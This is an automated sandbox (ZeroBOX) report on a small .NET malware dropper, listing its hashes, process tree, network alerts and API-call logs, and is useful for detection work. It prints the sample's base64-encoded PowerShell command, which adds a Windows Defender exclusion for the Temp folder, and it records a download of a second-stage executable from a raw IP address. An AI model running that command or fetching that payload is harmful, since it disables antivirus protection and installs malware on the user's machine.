Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 17, 2024, 1:21 p.m.	Sept. 17, 2024, 1:31 p.m.

Size	8.0KB
Type	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`290a51a1f510c3983bab387318311a00`
SHA256	`4010d6e2c545680af19ccfb7fdefd746be6aaf1a38b1b9e0a33ce58e0a398e04`
CRC32	`4EFD7065`
ssdeep	`96:2JxVVBeRbjTg5vxw48H7yjSNRw8lQ2fzedGPWvV6TC9k4SO9zNt:2rteVjM5vm48by6i8yGzNWvVYCe4r3`
PDB Path	C:\Users\Administrator\source\repos\ConsoleApp76\ConsoleApp76\obj\Release\ConsoleApp76.pdb
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description) IsPE32 - (no description)

999.exe "C:\Users\test22\AppData\Local\Temp\999.exe"
880
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABlAHgAYwBsAHUAZABlAFAAYQB0AGgAIAA9ACAAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABUAGUAbQBwACIADQAKAA0ACgAkAGMAdQByAHIAZQBuAHQARQB4AGMAbAB1AHMAaQBvAG4AcwAgAD0AIABHAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgADQAKAA0ACgBpAGYAIAAoACQAYwB1AHIAcgBlAG4AdABFAHgAYwBsAHUAcwBpAG8AbgBzACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGUAeABjAGwAdQBkAGUAUABhAHQAaAApACAAewANAAoAIAAgACAAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAHgAYwBsAHUAZABlAFAAYQB0AGgADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAHwRDBEIETAQgACQAZQB4AGMAbAB1AGQAZQBQAGEAdABoACAAQwRBBD8ENQRIBD0EPgQgADQEPgQxBDAEMgQ7BDUEPQQgADIEIAA4BEEEOgQ7BE4ERwQ1BD0EOARPBCAAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAuACIADQAKAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAfBEMEQgRMBCAAJABlAHgAYwBsAHUAZABlAFAAYQB0AGgAIABDBDYENQQgAD0EMARFBD4ENAQ4BEIEQQRPBCAAMgQgADgEQQQ6BDsETgRHBDUEPQQ4BE8ERQQgAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIALgAiAA0ACgB9AA==
  2164
- q2cbghl0.u2a.exe "C:\Users\test22\AppData\Local\Temp\q2cbghl0.u2a.exe"
  2376

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
147.45.44.131	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 147.45.44.131:80 -> 192.168.56.103:49164	2400022	ET DROP Spamhaus DROP Listed Traffic Inbound group 23	Misc Attack
TCP 192.168.56.103:49164 -> 147.45.44.131:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 147.45.44.131:80 -> 192.168.56.103:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 147.45.44.131:80 -> 192.168.56.103:49164	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 147.45.44.131:80 -> 192.168.56.103:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 17, 2024, 1:21 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 17, 2024, 1:21 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 17, 2024, 1:21 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 17, 2024, 1:21 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 17, 2024, 1:21 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 17, 2024, 1:21 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 17, 2024, 1:21 p.m.			0	0
IsDebuggerPresent Sept. 17, 2024, 1:21 p.m.			0	0
IsDebuggerPresent Sept. 17, 2024, 1:21 p.m.			0	0
IsDebuggerPresent Sept. 17, 2024, 1:21 p.m.			0	0
IsDebuggerPresent Sept. 17, 2024, 1:21 p.m.			0	0

Command line console output was observed (18 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: The term 'Get-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: At line:3 char:38 console_handle: 0x00000047	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: + $currentExclusions = Get-MpPreference <<<< \| Select-Object -ExpandProperty E console_handle: 0x00000053	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: xclusionPath console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Get-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x000000a3	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x000000af	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x000000bb	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: At line:6 char:21 console_handle: 0x000000c7	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath $excludePath console_handle: 0x000000d3	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x000000df	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: mmandNotFoundException console_handle: 0x000000eb	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000f7	1	1
WriteConsoleW Sept. 17, 2024, 1:21 p.m.	buffer: Путь C:\Users\test22\AppData\Local\Temp успешно добавлен в исключения Windows Defender. console_handle: 0x00000113	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004161f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004168f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004168f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004168f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00415fb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00415fb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00415fb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00415fb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00415fb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00415fb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004168f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004168f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004168f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004165f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004165f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004165f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416a30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004165f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004165f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004165f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004165f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004165f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004165f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004165f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 17, 2024, 1:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00416b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

C:\Users\Administrator\source\repos\ConsoleApp76\ConsoleApp76\obj\Release\ConsoleApp76.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 17, 2024, 1:21 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://147.45.44.131/files/ponos.exe

Performs some HTTP requests (1 event)

request

GET http://147.45.44.131/files/ponos.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 190 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00410000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00450000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ba0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x709e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x709e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02841000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02842000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 17, 2024, 1:21 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
